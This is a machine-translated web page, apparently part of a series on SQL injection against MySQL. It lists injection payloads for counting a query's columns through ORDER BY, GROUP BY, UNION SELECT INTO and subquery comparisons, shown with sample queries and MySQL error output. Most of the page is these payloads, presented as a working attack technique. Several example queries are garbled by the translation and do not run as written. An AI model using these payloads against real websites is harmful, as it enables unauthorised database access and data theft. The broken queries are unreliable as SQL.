International - English

Cart Console

Topic Center

Contact Sales

Home > Developer > MySQL

SQL injection Knowledge Base-mysql article (3)

Last Update:2015-03-10 Source: Internet

Author: User

Tags knowledge base

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

SQL injection Knowledge Base-mysql (2)

Tables and fields

First, the number of detection fields

Order By/group by

Group By/order by +1;

Note:

Both order by and group by are used to sort by fields.

Keep the number continuously increasing until you get an error response

Although group by and order by are different features in SQL, they can confirm the number of columns in the query in exactly the same way

Examples

Given the querySELECT username, password, permission FROM Users WHERE id = ‘{INJECTION POINT}‘;

1 ' ORDER by 1--+ True

Restore the Select Username,password,permission from the users where id = ' 1 ' ORDER by 1--+

From the Users table, query ID = 1 for username, password permission and then in ascending order by the first field (username)

1 ' ORDER by 2--+ True

。。。。

1 ' ORDER by 4--+ False indicates that the table has a total of 3 columns

1 ' Union Select------

Based on Error 1

Group BY or ORDER by 1,2,3,4,5 ...

Similar to the method mentioned above, we can judge the number of fields by a request to see if the error mode is started.

Examples

SELECT * FROM student where id = 1 order by; True

SELECT * FROM student where id = 1 ORDER by 1,2,3,4; True

SELECT * FROM student where id = 1 ORDER by 1,2,3,4,5; Return ERROR 1054 (42S22): Unknown column ' 5 ' in ' order clause '

Indicates that the table field has only 4 columns

SELECT * FROM student where id = 1 GROUP by 1,2,3,4,5; Return ERROR 1054 (42S22): Unknown column ' 5 ' in ' group statement '

Indicates that the table field has only 4 columns

Based on Error 2

Select ... into var_list, Var_list1, Var_list2 ....

1. If the error mode is turned on, this method will work correctly

2. is a practical way to find the number of fields, when there is a limit clause behind the injection point.

Examples

Given the querySELECT permission FROM Users WHERE id = {INJECTION POINT};

-1 Union Select 1 into @,@,@ The used SELECT statements has a different number of columns

-1 Union Select 1 into @ If the error is not indicated, the query information uses a

Mysql> Select Name,id1 from student limit + into @;
ERROR 1222 (21000): The used SELECT statements has a different number of columns
Mysql> Select Name,id1 from student limit to @,@;
Query OK, 1 row Affected (0.00 sec)

Field

Instance

Mysql> select name from student where id =-1 union select 1 into @; You can see that the query uses the Name field, so you won't get an error after using select 1 into @
Query OK, 1 row Affected (0.00 sec)

Mysql> Select NAME,ID1 from student where id =-1 union SELECT, into @,@; The name and id1 two fields are used here, so the corresponding use of the-into @,@ will not result in an error.
Query OK, 1 row Affected (0.00 sec)

Examples

Given the querySELECT username, permission FROM Users limit 1,{INJECTION POINT};

1 into @,@,@ error The used SELECT statements has a different number of columns

1 into @,@ no error indicates that there are 2 fields in the query

Instance:

Select NAME,ID1 from student limit to into @;
ERROR 1222 (21000): The used SELECT statements has a different number of columns
Select Name,id1 from student limit, into @,@;
Query OK, 1 row Affected (0.00 sec)

Limit usage:

Limit start position, take several select Name,id from student limit 0, 1; Remove the first data from the student table select Name,id from student limit 1, 1; Remove the second data from the student table select Name,id from student limit 0, 3; Remove 3 data from the student table, starting with the first one

Based on Error 3

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

Note:

Working in an environment where you know the table name but do not enable error echo, it returns the number of fields

Example

Given the querySELECT permission FROM Users WHERE id = {INJECTION POINT};

1 and (SELECT * from student) = 1

Instance:
Select Name,id from student where id = 1 and (SELECT * from student) = 1;

ERROR 1241 (21000): Operand should contain 4 column (s)

Select Name,id from student where id = 1 and (SELECT * from student) = 2;
ERROR 1241 (21000): Operand should contain 4 column (s)

SQL injection Knowledge Base-mysql article (3)

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:

php mysql knowledge base mysql blind sql injection mysql prevent sql injection php mysql sql injection mysql protect against sql injection php mysql prevent sql injection joomla knowledge base

MySQL batch update and batch update different values for mult... 01-13

The solution of no package Mysql-server available error when ... 05-28

The efficiency of MySQL nested query and connection query 11-16

The differences between int, bigint, smallint, and tinyint in... 10-17

MySQL Case statement (with instance) 04-01

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending

Top 10 Tags

datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling

Top 10 Keywords

microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

SQL injection Knowledge Base-mysql article (3)

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

Trending Topic

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support